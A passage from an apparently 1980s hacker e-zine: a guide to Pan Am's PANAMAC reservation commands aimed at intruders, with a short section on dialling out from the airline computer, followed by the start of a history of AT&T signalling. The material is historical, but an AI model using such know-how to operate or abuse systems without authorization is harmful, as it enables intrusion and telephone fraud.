  3231. the plane.
  3232.  
  3233. Entries in this category arrange for a specific item. (e.g. special meal)
  3234. to be provided on a flight for the passenger, or to advice the Airport the
  3235. passenger is traveling with something which may require advance preparation:
  3236. e.g a large pet in cargo or a large amount of excess baggage. Since we are
  3237. requesting that a specific items be provided (e.g special meal be put
  3238. on the flight), the entry is made with an action code. At the same time, the
  3239. entry is related to a specific segment(s) in an intinenary and to a particular
  3240. passenger name(s) in the PNR. We need to look at an example. Here is a PNR:
  3241.  
  3242. 1.1 SHAH/BUPENDRA 2.1EZRA/AMR
  3243. 1 PA 66 P 19APR JFKBOM HS2 2145 0015
  3244. RCVD/RLOC-MR SHAH
  3245. FONE-NYC-D 212/555/1234/H
  3246. TKT-026FEBNYC00020
  3247.  
  3248. Mr. Shah wants a vegetarian meal. Here is the entry:
  3249.  
  3250. >4 A VGML FS1 S1 N1
  3251.  
  3252. Lets break this down:
  3253.  
  3254. 4 - 4 field
  3255. A - Means add SCR
  3256. VGML - Vegetarian meal code
  3257. FS1 - Action Code (free sell ) + Number requested.
  3258. S1 - Related to Segment 1
  3259. N1 - Related to Name number 1
  3260.  
  3261. Look at this PNR carefully. The entry relates the special meal in this case
  3262. vegetarian to the first segment (S1) and to the first passenger, Mr. Shah,
  3263. who is name number 1 (N1). When re-displayed, the HA FAX field appears as
  3264. follows:
  3265.  
  3266. HA FAX-SSRVGML.PAHS01 PA0066P19APRJFKBOM 1SHAH/BUPENDER
  3267.  
  3268. Information about Pan Am policy and procedures governing some SSR entries can
  3269. be found in KISSR. Here is a display of the index:
  3270.  
  3271. SSR STATION INFORMATION
  3272.         INDEX
  3273. BASSINETS                    B
  3274. SPECIAL MEALS                S
  3275. WHEELCHAIRS                  W
  3276.  
  3277. In the KISSR you will find description and codes for all special meals and
  3278. facts about the current meal and wheelchair policy.
  3279.  
  3280. Not all SSR items may be freely sold (FS). The R.M describes the procedure
  3281. for requesting (needing) special service requirements. For example, request
  3282. (NN) on:
  3283.  
  3284.     Special meals within 8 hours of departure
  3285.  
  3286. or
  3287.  
  3288.     Excess baggage over 150 kilos (350 lbs)
  3289.  
  3290. Looks at this example:
  3291.  
  3292. Mr. C. Tuc in addition to his free allowance has baggage which will weigh
  3293. about 175 Kkilos. The entry will be:
  3294.  
  3295. >4A XBAG NN 175KGS S1 N2 . RECORDING EQUIPMENT
  3296.  
  3297. XBAG - This is the excess baggage code
  3298. NN - Action code
  3299. 175KGS - Weight in Kilos
  3300. S1 - Segment number
  3301. N2 - Name number 2
  3302. . - This separator which is compulsory
  3303. RECORDING EUIPMENT - Text
  3304.  
  3305.  
  3306. In this case there is also a description of the excess baggage. The description
  3307. or text is mandatory for this entry. The period(.) which acts as a separator
  3308. preceeds the text. All SSR entries regarding excess baggage must include a text
  3309. and may relate to only one passenger
  3310.  
  3311. When redisplayed, the HA FAX field now apprears follows:
  3312.  
  3313. HA FAX
  3314. 1.SSRVGMLPAGS01 PA0066P19APRJFKBOM 1 SHAH/RMR
  3315. 2.SSRKSMLPAHSO1 PA0066P19APRJFKBOM 1 TUC/AMR
  3316. 3.SSRXBAGPANN0175KG PA0066P19APRJFKBOM 1 TUC/AMR RECORDING EQUIPMENT
  3317.  
  3318. SSR Name relating
  3319. -----------------
  3320. In from of each name is a name item number. You already know that PANAMAC
  3321. assigns numbers for each different surname in a PNR. Also, each passenger
  3322. has a passenger name number. In the FACTS example so far, the item number and
  3323. the passenger name number were the same.
  3324.  
  3325.  
  3326.            A                B                   C
  3327. 1. 1AOKI/LSMRS 2. 1YAMADA/YRMRS 3. I/1YAMADA/GLENMSTR
  3328.  
  3329. 1,2,3 are Name Item NBR & the A,B,C are passenger name numbers
  3330.  
  3331. When you relate an SSR fact, your entry really refered to the name item i.e
  3332. N2 refers to all the passengers in name item 2 (in this case only Mrs. Yamada)
  3333. If however the entire Yamada family had been travelling together as in the
  3334. following example the name item include more than one name:
  3335.  
  3336. 1.1AOKI/LSMRS 2.3YAMADA/GOMR/YRMRS/LAMISS 5.1/1YAMADA/GLENMSTR
  3337. 1 PA 82 Y 16 NOV HNLAX HS4 2300 0604
  3338. 1 PA 81 Y 28 NOV LAXHNL HS4 1300 1702
  3339.  
  3340. If you SSR entry showed name relation to name N2, then the request would be for
  3341. all the passengers in NAME ITEM 2... Mr/Mrs/Miss Yamada/
  3342.  
  3343. To show a special request for only one passenger in a name item, use a slash
  3344. (/) after the name number. The slash acts to "separate" an individual
  3345. passenger from the name item may which may include multiple passenger.
  3346.  
  3347. For example: Mrs Yamada  is name NBR 3. To confirm a baby meal on both flights
  3348. the entry would be:
  3349.  
  3350. >4A BBML FS1 S1/2 N3/
  3351.  
  3352. The N3 indicates the name number only
  3353.  
  3354. Change/Delete/Cancel
  3355. --------------------
  3356.  
  3357. If you are in the process of making an SSR entry and you have ended the
  3358. transaction, no action has yet been taken on the request, You can therefore
  3359. delete the entry. For example
  3360.  
  3361. >4 3 [change symbol]
  3362.  
  3363. You on the other hand while at home can user "*" which works the same way.
  3364. The 4 is the field, the 3 is the Fact ITEM number .
  3365.  
  3366. You cannot modify an SSR entry to correct it. If your entry is incorrect, you
  3367. must delete the entry and reenter the correct SSR fact itme.
  3368.  
  3369. In all instance, whether working on a new or retrieved PNR, cancellation of
  3370. an itinenary segement will automatically cancel the related SSR item.
  3371.  
  3372. For e.g. you have booked:
  3373.  
  3374. 1.1BROWN/HARRYMR 2.1TOBAR/EMILEMR
  3375. 1 PA 100 Y 13NOV JFKLHR HS2 1000 2140
  3376.  
  3377. Before ending transaction you notice you accidentally confirmed the wrong date.
  3378. After cancellation of the incorrect segment, the HA FAX SSR item will look
  3379. like this:
  3380.  
  3381. HA FAX
  3382. 1.SSRKSMLPA(XX)02 PA0100Y13NOVJFKLHR 1BROWN/HARRYMR 1 TOBAR/EMILEMR
  3383.  
  3384. Cancelled SSR entries will automatically be removed from the PNR when you
  3385. End Trasaction. Now you would rebook the correct flight and the Kosher meals.
  3386.  
  3387.  
  3388.                                Part X
  3389.                                ------
  3390.  
  3391.  
  3392. Other Airlines...General Facts
  3393. ------------------------------
  3394.  
  3395. The GFAX or the General Facts, 3 filed contains the same (2) types of entries
  3396. as the Host Fax...OSI and SSR..Entries in the GFAX are included to outgoing
  3397. messages to other airlines upon ending trasaction. When an itinerary includes
  3398. space on another airlines, you must use the GFAX field to notify the other
  3399. airline about the special requirements or service information.
  3400.  
  3401. All entries in GFAX befin with the digit 3. To send "OSI" information to one
  3402. (1) other airlines, use the applicable carrier code. For instance, if the
  3403. passenger is an infant travelling on PA and AF, you notify Air France that you
  3404. booked an infant by sending an OSI message. The entry is:
  3405.  
  3406. >3 OSI AF INF JONES/MARK MSTR 5 MTS
  3407.  
  3408. This is in addition to an OSI entry in the 4 field to notify Pan Am at the
  3409. airport, Thus 2 entries with the same information are required.
  3410.  
  3411. >4 OSI PA INF JONES/MARK MSTR 5 MTS
  3412.  
  3413. If a passenger's itinenary include more than one other airline, use the letters
  3414. "YY" as the carrier code and make only one GFAX entry. A "YY" will send the
  3415. information to all the airlines in the itinerary.
  3416.  
  3417. >3 OS1 YY INF JONES/MARK MSTR 9 MTS
  3418.  
  3419. Change/Delete
  3420. -------------
  3421. The input to delete an OSI in the GFAX filed is the same as in HFAX.
  3422.  
  3423. >3 1 (change symbol)
  3424.  
  3425. To change an OSI entry in the GFAX field the format is the same. You delete,
  3426. then reenter the correct information.
  3427.  
  3428. >3 OSI AF.... (NEW INFO)
  3429.  
  3430. GFAX SSR Entries:
  3431. -----------------
  3432. SSR entries for other airlines are very similar to Pan Am HA FAX entries. The
  3433. entry begins with "3A", followed by the segment and name related request.
  3434.  
  3435. For e.g
  3436.  
  3437. >3A KSML NH1 S1 N1
  3438.  
  3439. Breakdown
  3440.  
  3441. 3A - This is the GFAX special service request
  3442. KSML - Meal code
  3443. NH1 - Action code to request
  3444. S1 - Segment number
  3445. N1 - Name item number.
  3446.  
  3447. Any SSR entry to another airline is always on a request basis (NH)
  3448.  
  3449. The request message is forwarded to the applicable airline(s) and must await
  3450. a reply. Meanwhile, the passenger is adivised the Pan Am has requested the
  3451. special service from the other airline(s) involved.
  3452.  
  3453. Assume that you have made the following reservations:
  3454.  
  3455. 1.1WILSON/ERMR
  3456. 1 PA  218 Y 26FEB CCSJFK HS1 X 0940 1420
  3457. 2 DL 1425 Y 26FEB JFKSLC HS1   1805 2040
  3458.  
  3459. The passengers desires a vegetarian meal and will be taking his dog (weight
  3460. 30 lbs) with him. To book the SSRs on Pan Am the entries are:
  3461.  
  3462. >4A VGML FS1 S1 N1
  3463. >4A AVHI FS1 S1 N1 . DOG 30 LBS (AVIH = live animals in hold)
  3464.  
  3465. To book the SSRs on Delta Airlines the entries are:
  3466.  
  3467. >3A VGML NN1 S2 N1
  3468. >3A AVIH NN1 S2 N1 . DOG 30 LBS
  3469.  
  3470. Change/Delete
  3471. -------------
  3472. To cancel or delete items in the GFAX handle exactly as in HFAX.
  3473.  
  3474. Before end Transaction: >3 1 (change symbol)
  3475. On a retrieved PNR: >3 . 1 XX
  3476.  
  3477. Encode/Decode ARIMP Abbreviations
  3478. ---------------------------------
  3479. "ARIMP" codes are abbreviated messages which are used to communicate within
  3480. the airline industry. These are listed in Panamac's "KI" information systems
  3481. and may be accessed using the following entries:
  3482.  
  3483. To find the code for a message (ENCODE), enter:
  3484.  
  3485. >KI COD _ (using first letter of subject)
  3486.  
  3487. To DECODE an abbreviated message, enter:
  3488.  
  3489. >KI DCO _ (using first letter of subject)
  3490.  
  3491.                                 Part XI
  3492.                                 -------
  3493. Advance Seat Assignments
  3494. ------------------------
  3495. It is Pan Am's policy to assign seats prior to departure only when requested
  3496. by passengers. As you know many of us may want specific seat numbers or certain
  3497. area for e.g  smoking,non-smoking,window seats,aisle.Seats have to be requested
  3498. when the booking is in progress.
  3499.  
  3500. Lets take an example. Lets say you have booked a seat for Mr. Davdison on
  3501. he has requested seat 3A which is in the non-smoking area and in the first
  3502. class (P) cabin. His entries looks like:
  3503.  
  3504. 1.1DAVIDSON/PLDR
  3505. 1 PA 30 P  19APR JFKLHR HS1 X 1200 1800
  3506. 2 PA 40 P  20APR LHRNBO HS1   100  700
  3507.  
  3508. To book his request a Host Facts entry is made. For e.g:
  3509.  
  3510. >4A NSST NN1 S1 N1 . SEAT 3A
  3511.  
  3512. 4A - Explained before
  3513. NSST - is code for Non Smoking Seat
  3514. NN1 - is the action code
  3515. S1 - Segment 1
  3516. N1 - Name 1
  3517. . - Separtor which is compulsory
  3518. 3A - This is the requested seat
  3519.  
  3520. If this seat is available then you will get a "*". A display of the PNR will
  3521. show the following:
  3522.  
  3523. 1.1DAVIDSON/PLDR
  3524. 1 PA 30 P 19APR JFKLHR HS1 X 1200 1800
  3525. 2 PA 40 P 20APR LHRNBO HS1   100 700
  3526. HA FAX-SSRNNSTPANN01 PA0040P19APR JFKLHR 1DAVIDSON/PLDR SEAT 3A
  3527.  
  3528. If the seat is already taken then the output will be:
  3529.  
  3530. RE-CHECK AVAILABILITY/REJECTED DATA FOLLOWS/4SSRNSSPANN01 PA0030
  3531. P19APRJUNJFKLHR 1DAVIDSON/PLDR SEAT 3A
  3532.  
  3533. To print an availability display (seats available) seat map must be displayed.
  3534. Enter:
  3535.  
  3536. >AC /S2 *
  3537.  
  3538. AC - is the availability cabin
  3539. S2 - This is the segment 2
  3540. * - Display
  3541.  
  3542. You will get something like this:
  3543.  
  3544. -PA0040P019APR JGKLHR 747-121 ZONE MAR AVAILABLE 9
  3545. * MOVIE SHOWN BETWEEN JFKLHR
  3546. A  B          C  D  E  F         G  H  J  K
  3547. P  P    1                  1           $
  3548. A* A*   2                  2        C  F
  3549. $  A*   3                  3        A* A*
  3550. 05----------
  3551.  
  3552. As you can see from the display that the requested seat is taken. The symbol
  3553. use here is "$". Now lets get into the explanation.
  3554.  
  3555. PA0040P19APR - Flight/Class/Date
  3556. JFKLHR - Board/Off points of the segment booked
  3557. 747-121 - This indicated the equiment used on the flight
  3558. NMR - Zone requested "N" - No smoking
  3559.                      "M" - Movies
  3560.                      "S" - Smoking
  3561.                      "W" - Without movie
  3562. AVAILABLE 9 - Total number of seats still available to confirm.
  3563. MOVIE SHOWN BETWEEN JFKLHR - Information on which sector the movie will be
  3564.                              shown.
  3565. A* - Indicates that if given the option, confirm these seats to passengers
  3566.      first. For e.g Seats 2B
  3567.                           3A B H J
  3568. $ - This indicates that it is taken. e.g Seat 1 J
  3569.                                               2 A
  3570.   - Blank indicates that seats dont exists on the aircraft
  3571. P - Seats behind a partition or bulkhead.
  3572. F - Special seating . People that require special seating ot handling
  3573. C - Compulsory seat usually assigned to F seats.
  3574. 05-------- - This indicates the last row in the zone and /or compartment
  3575. in this case Premium, First Class.
  3576.  
  3577.  
  3578. Some other commands:
  3579.  
  3580. > AC/S1*S - Use this entry command  if passengers request smoking
  3581. > AC/S1*W - Without movie ( No smoking is assured)
  3582. > AC/S1*WS - Without movie , Smoking specified.
  3583.  
  3584.                                  Part XII
  3585.                                  --------
  3586.  
  3587. When originating a PNR if a passenger decides to cancel and book a different
  3588. flight the seat confirmation will automatically be cancelled as in this
  3589. example (partial PNR display):
  3590.  
  3591. 1.1BRESLIN/BMS 2.1CARTER/ASFR
  3592. 1 PA 102 Y 26JUN JFKLHR 2100 0840
  3593. HA FAX-SSNSSTPAH02 PA102Y26Y26JUNJFKLHR 1IBRESLIN/BMS 1 CARTERASDR SEAT
  3594. 33 AB
  3595.  
  3596. Segment 1 cancelled
  3597.  
  3598. X1
  3599. NEXT REPLACES 1
  3600. FLT//SEG FACTS CANCELLED
  3601.  
  3602. *R
  3603.  
  3604. 1.1BRESLIN/BMS 2.1CARTER/ASDR
  3605. HA FAX-SSRNSSTPA(XK)02 PA102Y26JUNJFKLHR 1BRESLIN/BMS 1 CARTER/ASOR SEAT
  3606. 33 AB
  3607.  
  3608. Should a passenger wish to verify the seat description and/or location of his
  3609. seat. There is an entry to display a seat map. The entry is:
  3610.  
  3611. >VSSPA106/31JULIAADLHR*27
  3612.  
  3613. VSS - is the Verify Seat Selection
  3614. 27 - This is the row.
  3615.  
  3616. The response will be:
  3617.  
  3618. PA0106           1AD/LHR          31JUL
  3619.         Y        747-121     ROWS 27 ZONES LAST ROW F/ 7 C/19 Y/57
  3620.  
  3621. A    B    C        D    E    F    G         H    J     K
  3622. N M  N M  N M    21/NM N M   N M  N M   27/ N M  N M   N M
  3623. |         |____                         |
  3624. |             |                         |
  3625. no smoking    Movie                     ROW Number
  3626.  
  3627. Row 27 is a no-smoking seat, with a movie view, over the wing
  3628.  
  3629.  
  3630.  
  3631.                                  Part XIII
  3632.                                  ---------
  3633.  
  3634. This past will teach you all about hotels. I dont plan to go into details on
  3635. this but will just make you familiar.
  3636.  
  3637. There are 4 catagories of hotels:
  3638.  
  3639. 1. Intercontinental (IHC) the Grand Metropolitan Hotel chain
  3640.       (XM Inventory stored in the system
  3641. 2. Sheraton
  3642.       (XM Inventory stored in the system)
  3643. 3. Other hotels (Special Arrangement)
  3644.       (XP Availability )
  3645. 4. Unlisted Hotels
  3646.  
  3647. The XH and XM hotels have the actual inventory of thier rooms stored in
  3648. the system and together with XP hotels the three types give you immediate
  3649. availability. The hotels with whom Pan Am has a booking agreement are listed in
  3650. a City's Station Information. To display the hotel for a city the input is:
  3651.  
  3652. >KIBKKH
  3653.  
  3654. BKK is the 3 letter city code and H stands for Hotels. The response to this
  3655. would be something like:
  3656.  
  3657. BKK STATION INFORMATION
  3658. HOTEL INDEX
  3659. 1000 KENYAN CONTINENTAL
  3660. 1023 SHER BANKOK HOTEL
  3661. 2351 * TAMARIN *
  3662. 2342 ASIA
  3663. :
  3664. etc
  3665.  
  3666.  
  3667. The hotels are further identified in the hotel Index by a four digit number,
  3668. their name and location if other that the headline City it will be displayed
  3669. as "* TAMARIN *"
  3670.  
  3671. To determine of the hotel is "XH", "XM" or "XP" and to display details about a
  3672. hotel the input is:
  3673.  
  3674. >KI[Four digits Hotel Index]
  3675.  
  3676. Here is what the response may look like:
  3677.  
  3678. BKK HOTEL INFORMATION
  3679. 1009  SIAM    INTERCONTINENTAL
  3680. SIAM INTERCONTINENTAL
  3681. SIOUT PLACE 4290 HACKERS ROAD  * TEL 000000 *
  3682. SIAMICH     XH XH 0923
  3683. LHTL XH0923    H       C    PVKGBD0N
  3684. AS TL       EP   BHT        EP    P K   D0N
  3685. 04 00       01JAN-30DEC89
  3686.        MODR SGLB 1840
  3687.             DBLB 2000
  3688.             TRPB 2390
  3689.              :    :
  3690.              :    :
  3691. GCR - JAN/JUN SGLB 1600 DBLD 1820
  3692.       JUL/DEC SGLB 1600 DBLB 1820
  3693.  
  3694. NOTE LANAI ROOMS AND GROUND FLOOR ROOM ARE ON PERMANANT REQUEST
  3695. GUEST WILL BE MET AT AIRPORT BY HOTEL REPRESENTATIVE AND ASSISTED TO HOTEL
  3696. :
  3697. :
  3698. :
  3699.  
  3700. LOCATION  - CENTERS OF CITY OFF SIAM AQ. WITH EASY
  3701.             ACCESS TO ALL SECTIONS OF THE CITY
  3702.             THREE MAIN FROM ROYAL BKK SPORTS CLUB
  3703.             NATIONAL STADIUM.
  3704. TRANSPORTATION - 35 MIN BY TAXI ARPT
  3705.                  25 MIN BY TAXI TO DOCK
  3706. SERVICES- ROOM SVC 24 HRS LAUNDRY/VALET 24 HRS
  3707. SPORTS - POOL,GYM ROOM,SHOOTING
  3708.  
  3709. END
  3710.  
  3711. The sixth line contains the booking code (in this case XH0923)
  3712.  
  3713. This display has been shortened to make things easy.
  3714.  
  3715. Hotels are booked in 2 ways:
  3716.  
  3717. 1) Short Selling them using HOTEL booking code
  3718.    XH ........ >N1 DBLB XH1122-10OCT  15OCT  MODR
  3719.    XM ........ >N2 SGLB XM1355-05MAR  12 MAR MAXR
  3720.    XP ........ >N1 TWNB XP3087-02JUL 9JUL MODR
  3721.  
  3722. 2) The other way is a Segment entry for UNLISTED.
  3723.    >0 HTL PA NH1 ROM 1N23-JUL-OUT30JUL DBLB MODR DORA
  3724.  
  3725.  
  3726.                                 Part XIV
  3727.                                 --------
  3728. Personell who can access the Pan Am main computer may also be able to call
  3729. out. I am not positively sure about this because this info was recently given
  3730. to me by a Pan Am employee. Enter as follows:
  3731.  
  3732. >HOLD NETCHANNEL 1
  3733.  
  3734. There may be many netchannels in the systems. If it is occupied then it will
  3735. give a "CHANNEL 1 BUSY" error.
  3736.  
  3737. Then it will prompt you for a call out password. This is different from your
  3738. login password.
  3739.  
  3740. Password : XXXXXXXXXX
  3741.  
  3742. Then the immediatly after that it will give a prompt "#" . This is where you
  3743. will be able to input digits to call out.
  3744.  
  3745. # (317)5552322
  3746.  
  3747.  
  3748.                             Part XV [Misc]
  3749.                             --------------
  3750.  
  3751. Airline Codes
  3752. -------------
  3753.  
  3754. Pan Am, and all other airlines, use a two-letter airline identification code
  3755. for reservation and ticketing purposes. There is no hard and fast rule as to
  3756. how the two-letter code is derived. These codes are assigned by IATA/ARC.
  3757. This list contains some of the worlds major airlines.
  3758.  
  3759. Hope this list will come in handy.
  3760.  
  3761. Airline                 Airline Code     Airline                Airline Code
  3762. ------------------------------------     -----------------------------------
  3763. AER LINGUS                  EI           AEROFLOT                    SU
  3764. AREOLINEAS ARGENTINAS       AR           AERO MEXICO                 AM
  3765. AIR AFRIQUE                 RK           AIR CANADA                  AC
  3766. AIR FRANCE                  AF           AIR INDIA                   AI
  3767. AIR NEW ZEALAND - INT.      TE           ALASKA AIRLINES             AS
  3768. ALITILIA                    AZ           ALOHA AILINES               AQ
  3769. AMERICAN AIRLINES           AA           AUSTRIAN AIRLINES           OS
  3770. AVENSA                      VE           AVIANCA                     AV
  3771. BRITISH AIRWAYS             BA           BWIA INT.                   BW
  3772. CAAC - CHINA                CA           CATHAY PACIFIC AIRWAYS      CX
  3773. CHINA AIRLINES              CI           CONTINENTAL AIRLINES        CO
  3774. CP AIR (CANAIAN PACIFIC)    CP           DELTA AIRLINES              DL
  3775. EASTERN AIRLINES            EA           EL AL                       LY
  3776. GULF AIR                    GF           HAWAIIAN AIRLINES           HA
  3777. IBERIA                      IB           INDIAN AIRWAYS CORP.        IC
  3778. JAPAN AIR LINES             JL           KLM ROYAL DUTCH AIRLINES    KL
  3779. KOREAN AIR LINES            KE           LACSA                       LR
  3780. LAN-CHILE                   LA           LUFTHANSA                   LH
  3781. LIAT                        LI           MEXICANA                    MX
  3782. NORTHWEST                   NW           OLYMPIC AIRWAYS             OA
  3783. PAN AM                      PA           PIEDMONT AIRLINES           PI
  3784. QANTAS                      QF           SABENA                      SN
  3785. SAS                         SK           SAUDIA                      SV
  3786. SINGAPORE                   SQ           SOUTH AFRICAN               SA
  3787. SWISSAIR                    SR           TAP (AIR PORTUGAL)          TP
  3788. TWA                         TW           UNITED AIRLINES             UA
  3789. US AIR                      AL           VASP AIRWAYS                VP
  3790. VARIG                       RG
  3791.  
  3792.  
  3793.  
  3794. Conclusion
  3795. ----------
  3796.  
  3797. Hope all have found this article of some intrest. My apologies for the lenght.
  3798. I have tried my best to include all major topics that may be usefull to the
  3799. hacker. I suppose now you know that booking flights is not that easy process.
  3800. So next time please dont start yelling at the poor sales agent for some minor
  3801. problem.
  3802.  
  3803. Using this system can be a lot of fun. Although one can create a major havoc
  3804. after infiltration. I urge you all not to do any of that sort. This system is
  3805. quite delicate and one should be very carefull when using it. All the reverse
  3806. command processes have been included in this article. I have purposely left out
  3807. some commands that proved to be harmfull to the system.
  3808.  
  3809. Under no circumstances am I responsible for this article's contents, for this
  3810. serves only as an educational tool.
  3811.  
  3812. I would like to thank Mr. C of the Pan Am Security Division for all his help.
  3813.  
  3814. If anyone wishes to get in touch with me, I can be contacted at the Hacker's
  3815. Den or at the Phoenix Project.
  3816.  
  3817. Best of luck!
  3818.  
  3819.              Red Knight
  3820.              @ Phun Magazine Inc.
  3821.              Hackers Den88 (718)358/9209
  3822.  
  3823.  
  3824.  
  3825. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  3826. =                  P/HUN Issue #3, Volume 2: Phile #7 of 11                   =
  3827. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  3828.  
  3829.               Common Channel (InterOffice) Signalling: An overview
  3830.               DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  3831.                                By Tubular Phreak
  3832.  
  3833.  
  3834.  References:
  3835.  o - BTJ!
  3836.  o - AT&T comunications
  3837.  o - Tel-Network planing
  3838.  
  3839. This article will inform you of the stages CCS has gone through over the past
  3840. years.
  3841. CSC known originally as Common Channel Interoffice Signalling was introduced
  3842. back in 1976. Since its introduction it has added datagram direct signalling
  3843. and has been modernized  by new digital and proccesor technology
  3844. and by delvelopments in software enginerring techniques.
  3845. This prevents Blue Boxing due to the fact that signals are carried over a
  3846. different link than voice.
  3847. CCIS net improved its the old trunk signalling bettween SPC (Stored Control
  3848. Program) toll switches thereby increasing speed and its economical.
  3849. The CCIS network was composed of what know as STPs(Singal Trasfer Points)
  3850.  
  3851.  
  3852.        CCIS Network
  3853.        ------------
  3854.  
  3855.  Region #1      + Region #2
  3856.  **             +         **
  3857.   |             +          |
  3858.   |             +          |
  3859.   |             +          |
  3860. (SPC)------**      **----(SPC)
  3861.   |________________________|
  3862.  
  3863. ** - STP mated pair
  3864. __ - Voice Trunks
  3865. |  - Links
  3866. + - Divider
  3867.  
  3868.  
  3869. The Datalinks use 2.4 kb/s(kilobytes per second).In 1979 they used 1A switch
  3870. was added.
  3871.  
  3872. Later in 80 they added a special feature of direct signalling (datagram)
  3873. which operate at 4.8 kb/s. This capability provided the SPC machines with
  3874. the neccesary information through the CCIS Net.The allowed NCP (Network Control
  3875. Points). The NCPs connect directly to CCIS at certain STPs.
  3876. The SPC machines quired the NCPs and receives the instructions for the action
  3877. in response.Therefore they became known as ACPs(Action Control Points).
  3878. This status if the CCIS provided 800 services and calling cards.
  3879.  
  3880. In 1985 the siganlling network added 2STPs and 56kb/s.This new network was
  3881. called CCS7. This new method of signalling used CCITT No.7 Protocol and with
  3882. it new more efficient feature came like ISDN.
  3883.  
  3884.                           Archaic CCIS in 76'
  3885.                           DDDDDDDDDDDDDDDDDD
  3886. Before the introduction of CCIS, SF/MF signalling method was in use.
  3887. The SF was responsible in determining the idle/busy side state of a trunk.
  3888. 2600 Hz the idle trunk was removed when a call was to be placed on the trunk.
  3889. Then MF signaling was used to determine  routing information to the distant
  3890. end and when the party answered the SF was removed from there side.
  3891.  
  3892. Tandem switching was not economical and was slow.
  3893.  
  3894. As the introduction of SPC came about in which common control equipment was
  3895. based on electronic procedures, the overhead associated with the call setup
  3896. became a more dominant factor. MF/SF signaling was used until a toll switch
  3897. ESS4 was introduced in 76'. Therefore AT&T produced CCIS in assocation with
  3898. the ESS4 toll switch. Signalling used a different link than voice.
  3899. As mentioned above CCIS used 2.4/kb signalling links to transmit the signal.
  3900. Due to the fact that one 2.4/kb could could provide for more than 2000 trunks,
  3901. therfore the a regional STP was put in place.
  3902. Each STP was connected to several toll switches.Each regional STP was connected
  3903. to each of the distant STPs.Each STP was connected to its parner which provided
  3904. a path for connections between switches if there was a failure of distant STPs
  3905. The STPs in the network were provided by a portion of the processor associated
  3906. with the 4A-ETS(Electronic Translator Systems). Message routine within the
  3907. STPs was performed by a band and lable scheme that defined a virtual signalling
  3908. circuit where 512 bands of 16 trunks coule be accomodated. This allows 8192
  3909. voice trunks to be uniquely identified on a specific signaling link.
  3910.  
  3911.                      Direct Dialing Signalling(1980)
  3912.                      DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  3913. In 1980, a direct signalling capability was added to the CCIS Network. This
  3914. capability allwed messages to be sent from a signalling point to any other
  3915. signalling point in the network and supported a new network architechture in
  3916. which a portion if the switched network routing instruction could be placed an
  3917. a database shared by multiple SPC switches.
  3918. These common databases became known as network control points (NCPs). The SPC
  3919. switches became known as action points (ACPs). because they performed actions
  3920. based on instructions from NCPs. This required an inquiry-response in the
  3921. Common Channel Interoffice Network.
  3922.  
  3923. This communication between ACPs and NCPs was performed by a new feature called
  3924. Datagram Direct Signalling. Unlike banded(trunk) signalling. This method of
  3925. signalling directed messages on a destination-routing basis through all the
  3926. Singal Tranfer Points. Therefore the direct signalling messages included a
  3927. unique destination address that was used by the STPs to route the message based
  3928. on a table that associated destination addresses with physical points in the
  3929. network. With this, the CCIS network could direct messages to individual
  3930. functions allowing the introduction of unique services such as advanced 800
  3931. with features like time of day routing call prompter and customer-controlled
  3932. routing of traffic based on information stored at central databases.
  3933.  
  3934.                          CCIS Network Growth
  3935.                          DDDDDDDDDDDDDDDDDDD
  3936. As the AT&T network grew both in terms of SPC swicthes and volume of traffic,
  3937. it became necessary to augment the initial CCIS network capability. First the
  3938. number of STP pairs was increased from the initial 10 pairs to 16 pairs.
  3939. Three of the additional -airs were used as area STPs, which served the trunking
  3940. needs of the portion of the network. The remaining 3 STP pairs were associated
  3941. directly with NCP pairs and performed a direct signal funtion. In addition
  3942. the message handling capacity of the network was increased by deploying 4-8kb/s
  3943. signalling links in place of the original 2.4kb/s links.STP processing capacity
  3944. was also increased as the original shared use of the ETS processor was removed
  3945. when the switch function at each STP location was transfered to a new 4 Elect-
  3946. ronics Switching System machines.
  3947.  
  3948.                The Impact of AT&T Divestiture on CCIS Network
  3949.                DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  3950. On January 1, 1984 the court-ordered AT&T divestiture became effective.
  3951. Divestiture establishment local access and transport areas (LATAs), which
  3952. defined local markets areas. AT&T became an inter-LATA carrier providing
  3953. communication services between these LATAs. Under the divestiture agreements,
  3954. the STPs,NCPs,and interconnecting data links were assigned to AT&T. The minor
  3955. use of these facilities by the divestiture BOCs(Bell Operating Companies) was
  3956. provided under contract.Equal access to the inter-LATA carriers under
  3957. divestiture was provided mostly by MF/SF signalling. However a new multi-stage
  3958. MF outpulsing arrangement was added to forward the orginating number to inter-
  3959. LATA carrier for billing and other purposes.
  3960.  
  3961.                      Common Channel Signalling 7 (1985)
  3962.                      DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  3963. During 1985, the STP capability was enhanced by the introduction of 2STP based
  3964. on the AT&T 3B20 duplex (3B20D) processor and an associated processor inter-
  3965. connect capability (PIC).In addition , 56-kb/s digital facilities were provided
  3966. between the STPs. The 2STP uses the CCITT Signalling System 7 protocol and
  3967. provides message transfer part (MTP) function. The MTP can route a message
  3968. reliably and qucikly from one point in the signalling network to any other
  3969. point. The resulting network has been named the CCS7 network. Initially, the
  3970. CCS7 network was used to augment the trunk signalling capabilities of the 1STP
  3971. network using the embedded CCIS6 (ECIS6) protocol. ECIS6 interacts with CCS7
  3972. and allows switching systems connected to the 1STP network to communicate with
  3973. other switches connected to the 2STP network.However during this transitional
  3974. period, all switching systems are connected to either the 1STP or 2STP
  3975. locations via 2.4 or 4.8 kb/s signalling links.
  3976.  
  3977.                        CCS7 Destination CCIS (1986)
  3978.                        DDDDDDDDDDDDDDDDDDDDDDDDDDDD
  3979. In 1986 the CCS7 network was expanded to include direct signalling. This was
  3980. done by adding new capabilities in the NCPs to allow 56-kb/s connecting links
  3981. and the ability to route direct-signalling messages within the 2STPs. For
  3982. transitional compatibility, a new destination CCIS6 (DCIS6) interworking
  3983. protocol was deployed. The 4ESS and 5ESS switches in the network will use the
  3984. Integrated Services Digital Network User Part (ISDN-UP) to control call setip
  3985. and will have the capability to support ISDN services. The ISDN-UP will use the
  3986. services of the already deployed MTP and provide a broad set of switched
